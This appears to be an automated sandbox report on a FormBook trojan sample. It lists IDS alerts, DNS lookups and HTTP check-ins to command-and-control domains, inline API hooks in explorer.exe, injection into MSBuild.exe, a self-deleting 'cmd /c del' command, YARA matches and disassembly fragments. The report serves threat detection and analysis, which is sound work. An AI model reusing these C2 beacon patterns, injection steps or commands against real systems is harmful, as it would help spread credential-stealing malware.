02/16/23-23:50:01.373956 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49711 | 80 | 192.168.2.5 | 213.171.195.105
02/16/23-23:50:26.920788 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49713 | 80 | 192.168.2.5 | 160.121.126.44
02/16/23-23:50:01.373956 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49711 | 80 | 192.168.2.5 | 213.171.195.105
02/16/23-23:50:01.373956 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49711 | 80 | 192.168.2.5 | 213.171.195.105
02/16/23-23:50:26.920788 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49713 | 80 | 192.168.2.5 | 160.121.126.44

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 16, 2023 23:49:20.711571932 CET | 192.168.2.5 | 8.8.8.8 | 0x964a | Standard query (0) | www.anbietertest.com | A (IP address) | IN (0x0001) | false
Feb 16, 2023 23:49:39.775243998 CET | 192.168.2.5 | 8.8.8.8 | 0xc6c7 | Standard query (0) | www.hblcfl.com | A (IP address) | IN (0x0001) | false
Feb 16, 2023 23:50:01.298953056 CET | 192.168.2.5 | 8.8.8.8 | 0x97f4 | Standard query (0) | www.desipizza.uk | A (IP address) | IN (0x0001) | false
Feb 16, 2023 23:50:26.690507889 CET | 192.168.2.5 | 8.8.8.8 | 0xdf2f | Standard query (0) | www.couldskuathink.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 16, 2023 23:49:20.892816067 CET | 8.8.8.8 | 192.168.2.5 | 0x964a | No error (0) | www.anbietertest.com | | 45.195.140.44 | A (IP address) | IN (0x0001) | false
Feb 16, 2023 23:49:39.951545000 CET | 8.8.8.8 | 192.168.2.5 | 0xc6c7 | No error (0) | www.hblcfl.com | | 156.242.168.70 | A (IP address) | IN (0x0001) | false
Feb 16, 2023 23:49:39.951545000 CET | 8.8.8.8 | 192.168.2.5 | 0xc6c7 | No error (0) | www.hblcfl.com | | 172.241.173.201 | A (IP address) | IN (0x0001) | false
Feb 16, 2023 23:50:01.327773094 CET | 8.8.8.8 | 192.168.2.5 | 0x97f4 | No error (0) | www.desipizza.uk | | 213.171.195.105 | A (IP address) | IN (0x0001) | false
Feb 16, 2023 23:50:26.713769913 CET | 8.8.8.8 | 192.168.2.5 | 0xdf2f | No error (0) | www.couldskuathink.com | | 160.121.126.44 | A (IP address) | IN (0x0001) | false

                                          • www.anbietertest.com
                                          • www.hblcfl.com
                                          • www.desipizza.uk
                                          • www.couldskuathink.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49707 | 45.195.140.44 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 16, 2023 23:49:21.154639006 CET | 22 | OUT | GET /p25s/?T6AhrZK=8vxucxXa/EdtAtEUVmScDgQ/joE+PM1yWDdp5simyx02ZDdzbP+rJDfYcK0t31FDPOoC&W2MXm=JzuDhNAPN4 HTTP/1.1
Host: www.anbietertest.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 16, 2023 23:49:21.409626007 CET | 22 | IN | HTTP/1.1 503 Service Unavailable
                                          Server: nginx/1.14.2
                                          Date: Thu, 16 Feb 2023 22:49:21 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Data Raw: 31 33 0d 0a 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 13Service Unavailable0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49709 | 156.242.168.70 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 16, 2023 23:49:40.180020094 CET | 30 | OUT | GET /p25s/?T6AhrZK=ewBdcR2k39opbljxfcdCb6O0QV5Mz3QFjc7TltSJEncU02WcdPmt9gDEZVm+Mf599Sy4&W2MXm=JzuDhNAPN4 HTTP/1.1
Host: www.hblcfl.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 16, 2023 23:49:40.575741053 CET | 31 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Thu, 16 Feb 2023 22:47:33 GMT
                                          Content-Type: text/html
                                          Content-Length: 466
                                          Connection: close
                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>404</title></head><body><script type="text/javascript" src="http://www.qq.com/404/search_children.js" charset="utf-8"></script> <a href="/"></a></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49711 | 213.171.195.105 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 16, 2023 23:50:01.373955965 CET | 39 | OUT | GET /p25s/?T6AhrZK=Ph2/VWOiWysesScqmGnEABkQXxW9tNK0oaQwIZbckmwGK9MQJoSsZuxrXVYCsjKEmA2B&W2MXm=JzuDhNAPN4 HTTP/1.1
Host: www.desipizza.uk
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 16, 2023 23:50:01.407166004 CET | 39 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.20.1
                                          Date: Thu, 16 Feb 2023 22:50:01 GMT
                                          Content-Type: text/html
                                          Content-Length: 6486
                                          Last-Modified: Tue, 10 May 2022 13:33:35 GMT
                                          Connection: close
                                          ETag: "627a69af-1956"
                                          Accept-Ranges: bytes
Feb 16, 2023 23:50:01.407186985 CET | 40 | IN |
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Domain parking page</title>
Feb 16, 2023 23:50:01.407206059 CET | 42 | IN |
Data Ascii: ass="card-title card-title-lg">Looking to buy a similar domain to</p> <p class="card-subtitle"><span class="domainVar"></span>?</p> <a class="btn btn-primary" onclick="searchSimilarDomains()" rel="nofollow">STAR
Feb 16, 2023 23:50:01.407239914 CET | 43 | IN |
Data Ascii: Ellipse_2706" data-name="Ellipse 2706" cx="55" cy="45.5" rx="55" ry="45.5" transform="translate(1085 526)" fill="#ffda84"/> <g id="Group_12722" data-name="Group 12722" transform="translate(1119.711 505.758)">
Feb 16, 2023 23:50:01.407275915 CET | 44 | IN |
Data Ascii: <path id="Path_16781" data-name="Path 16781" d="M-344.883,357.87a.085.085,0,0,1-.164,0,5.343,5.343,0,0,0-1.362-2.345,5.35,5.35,0,0,0-2.36-1.37.085.085,0,0,1,0-.164,5.459,5.459,0,0,0,2.382-1.415,5.458,5.458,0,0,0,1.3
Feb 16, 2023 23:50:01.408441067 CET | 46 | IN |
Data Ascii: le">Access all the tools you need for online success.</p> <a class="btn hooverable btn-secondary btn-fix" href="https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking
Feb 16, 2023 23:50:01.408461094 CET | 46 | IN |
Data Ascii: rral&utm_campaign=fh_parking_dac`;}</script></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
3 | 192.168.2.5 | 49713 | 160.121.126.44 | 80
Timestamp | kBytes transferred | Direction | Data
Feb 16, 2023 23:50:26.920788050 CET | 53 | OUT | GET /p25s/?T6AhrZK=yZFdiTidJj8nP1vzUKUfsyX5oeLLmZHlT7g0d1PIFjuzqgtSB3FqzQPSF8sPoM2nTXau&W2MXm=JzuDhNAPN4 HTTP/1.1
Host: www.couldskuathink.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 16, 2023 23:50:27.130139112 CET | 54 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Thu, 16 Feb 2023 22:50:27 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 1.0


                                          Code Manipulations

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8B 0xBE 0xE2
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x83 0x3E 0xE2
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x83 0x3E 0xE2
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8B 0xBE 0xE2


                                          Target ID:0
                                          Start time:23:48:09
                                          Start date:16/02/2023
                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
                                          Imagebase:0x650000
                                          File size:740864 bytes
                                          MD5 hash:19A7C2A3F614A2F0C25065ED749EFF53
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Target ID:1
                                          Start time:23:48:21
                                          Start date:16/02/2023
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          Imagebase:0x1e0000
                                          File size:261728 bytes
                                          MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Target ID:2
                                          Start time:23:48:21
                                          Start date:16/02/2023
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          Imagebase:0x310000
                                          File size:261728 bytes
                                          MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Target ID:3
                                          Start time:23:48:21
                                          Start date:16/02/2023
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          Imagebase:0x550000
                                          File size:261728 bytes
                                          MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high

                                          Target ID:4
                                          Start time:23:48:26
                                          Start date:16/02/2023
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff69bc80000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000004.00000002.582276153.000000000E3F1000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high

                                          Target ID:5
                                          Start time:23:48:40
                                          Start date:16/02/2023
                                          Path:C:\Windows\SysWOW64\cmmon32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                          Imagebase:0x1030000
                                          File size:36864 bytes
                                          MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high

                                          Target ID:6
                                          Start time:23:48:45
                                          Start date:16/02/2023
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                          Imagebase:0x11d0000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language

                                          Target ID:7
                                          Start time:23:48:45
                                          Start date:16/02/2023
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7fcd70000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language

                                            Execution Graph

                                            Execution Coverage:12.6%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:110
                                            Total number of Limit Nodes:7

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 285de6c-285fdfe 2 285fe00-285fe06 0->2 3 285fe09-285fe10 0->3 2->3 4 285fe12-285fe18 3->4 5 285fe1b-285feba CreateWindowExW 3->5 4->5 7 285fec3-285fefb 5->7 8 285febc-285fec2 5->8 12 285fefd-285ff00 7->12 13 285ff08 7->13 8->7 12->13
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0285FEAA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331997826.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2850000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: c10a833935f71e8ed562b10b03893323317fe30354842a784b1a929d3f6b43ab
                                            • Instruction ID: a60e2c28088901b453f6007b73b11a069a80e37c6d85f232d1e1b7568be1b124
                                            • Opcode Fuzzy Hash: c10a833935f71e8ed562b10b03893323317fe30354842a784b1a929d3f6b43ab
                                            • Instruction Fuzzy Hash: BF51D1B5D00318DFDB14CF9AC884ADEBBB5BF48314F24852AE919AB250D774A845CF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 14 2855364-2855431 CreateActCtxA 16 2855433-2855439 14->16 17 285543a-2855494 14->17 16->17 24 2855496-2855499 17->24 25 28554a3-28554a7 17->25 24->25 26 28554a9-28554b5 25->26 27 28554b8 25->27 26->27 29 28554b9 27->29 29->29
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 02855421
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331997826.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2850000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 3c469e7cf8b08d063b3ebfd552661cdadb5c9370a84592468fe76a636d59fffc
                                            • Instruction ID: bf98e3b12f8bf5b6397e632423da2a7983f00b5af6f2a2fd5765947efe78c6ee
                                            • Opcode Fuzzy Hash: 3c469e7cf8b08d063b3ebfd552661cdadb5c9370a84592468fe76a636d59fffc
                                            • Instruction Fuzzy Hash: 9141E2B5C00628CFDB24DFA9C8847DEBBB1BF49314F608069D409BB251D779694ACF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 30 2853de4-2855431 CreateActCtxA 33 2855433-2855439 30->33 34 285543a-2855494 30->34 33->34 41 2855496-2855499 34->41 42 28554a3-28554a7 34->42 41->42 43 28554a9-28554b5 42->43 44 28554b8 42->44 43->44 46 28554b9 44->46 46->46
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 02855421
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331997826.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2850000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 0eacaa69df40a9b74e889841ff49f2eafc8498517c84453b65ac03c913e7412e
                                            • Instruction ID: 0749a5fd8a09094806397c52ad5218f21eb770ad6c14ef44ff4efbc9db3ee43e
                                            • Opcode Fuzzy Hash: 0eacaa69df40a9b74e889841ff49f2eafc8498517c84453b65ac03c913e7412e
                                            • Instruction Fuzzy Hash: 0441B2B5C0062CCFDB24DFAAC88479EBBB5BF48314F608169D409BB251D7B56949CF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 47 28598a0-285b9ec DuplicateHandle 49 285b9f5-285ba12 47->49 50 285b9ee-285b9f4 47->50 50->49
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0285B91E,?,?,?,?,?), ref: 0285B9DF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331997826.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2850000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: c98a309448b8b481dabb098fb20c9f627ac785be04114dfbea00bdef02ab1d10
                                            • Instruction ID: e1efe524837ca1dfb5e7c11318b280146111eb10477b63a95ee0f62c72830a50
                                            • Opcode Fuzzy Hash: c98a309448b8b481dabb098fb20c9f627ac785be04114dfbea00bdef02ab1d10
                                            • Instruction Fuzzy Hash: BA2134B59002089FDB10CF9AD884AEEBBF8FB48324F10802AE914B7310D374A944CFA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 53 2859518-2859bd8 55 2859be0-2859c0f LoadLibraryExW 53->55 56 2859bda-2859bdd 53->56 57 2859c11-2859c17 55->57 58 2859c18-2859c35 55->58 56->55 57->58
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,028599F1,00000800,00000000,00000000), ref: 02859C02
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331997826.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2850000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 70e25d3c8ec28682125316a723fc2d34d63706d0d185140d7dbea750c0c613ef
                                            • Instruction ID: 6f6073b3d1b0a6b02914c145174713c5fe26a4a7bd6d85d35491ec83759e0941
                                            • Opcode Fuzzy Hash: 70e25d3c8ec28682125316a723fc2d34d63706d0d185140d7dbea750c0c613ef
                                            • Instruction Fuzzy Hash: B81106BA900219DFDB10CF9AC444ADEBBF4AB48314F10846AE819A7600C374A945CFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 61 2859b94-2859bd8 62 2859be0-2859c0f LoadLibraryExW 61->62 63 2859bda-2859bdd 61->63 64 2859c11-2859c17 62->64 65 2859c18-2859c35 62->65 63->62 64->65
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,028599F1,00000800,00000000,00000000), ref: 02859C02
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331997826.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2850000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 9a5d2ea1bf1aa2cbefe2aeb36a7d967e00b53daded7d1ac61873476a9e5b2dd8
                                            • Instruction ID: b685aa081a342ee31ab2d9e7aa1c584341956f353979d3edf1249a6e38fe494c
                                            • Opcode Fuzzy Hash: 9a5d2ea1bf1aa2cbefe2aeb36a7d967e00b53daded7d1ac61873476a9e5b2dd8
                                            • Instruction Fuzzy Hash: C11114B6900249CFDB10CF9AD484BDEFBF4AB88360F14842AD819A7600C378A545CFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 68 2859910-2859950 69 2859952-2859955 68->69 70 2859958-2859983 GetModuleHandleW 68->70 69->70 71 2859985-285998b 70->71 72 285998c-28599a0 70->72 71->72
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02859976
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331997826.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2850000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: fae0d35510b599add5d09a805fb5adbeedc00c2e95d881d0751fcba21184e05b
                                            • Instruction ID: d30b3f44e388f946e550f3eb1468ab34259456cfa0a1119d586d64422d181a57
                                            • Opcode Fuzzy Hash: fae0d35510b599add5d09a805fb5adbeedc00c2e95d881d0751fcba21184e05b
                                            • Instruction Fuzzy Hash: 5E1113B5C002498FCB10CF9AC484BDEFBF4AF88324F10842AD859B7600C378A545CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331731538.0000000000DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DCD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_dcd000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f318b2fdb477ff1564a4823e627ca45633ddc88757d24a815413383b45efb0da
                                            • Instruction ID: d0b0d8d34cef1cc5b28abaf03bd0f442209cedc1d65ffa8c687367c595527b2d
                                            • Opcode Fuzzy Hash: f318b2fdb477ff1564a4823e627ca45633ddc88757d24a815413383b45efb0da
                                            • Instruction Fuzzy Hash: 3221FFB2504241EFDB05DF14D9C0F26BF66FB88328F24867DE8450B246C336E846DAB1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331767965.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ddd000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9b4a5949a51a33f2569bcd5eabe5cc5c7a43bc98415c79281881c79748ef731c
                                            • Instruction ID: c547dc21984c3cf4ce25b0b0bee58c20ca69d293820c374e5adf0aeecada0fda
                                            • Opcode Fuzzy Hash: 9b4a5949a51a33f2569bcd5eabe5cc5c7a43bc98415c79281881c79748ef731c
                                            • Instruction Fuzzy Hash: BD21D075604240DFDF15DF24D9C0B26BBA6FB88324F24CA6AE84A4B346C336D847DA71
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331767965.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ddd000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8d49e501fd6e41d5103823965f5685fbf2c665db4cfca6c762eac28ce0efb11d

                                            Execution Graph

                                            Execution Coverage:3.8%
                                            Dynamic/Decrypted Code Coverage:2.7%
                                            Signature Coverage:5.8%
                                            Total number of Nodes:550
                                            Total number of Limit Nodes:73

                                            Control-flow Graph

                                            control_flow_graph 0 41a410-41a459 call 41af60 NtReadFile
                                            C-Code - Quality: 37%
                                            			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                            				void* _t18;
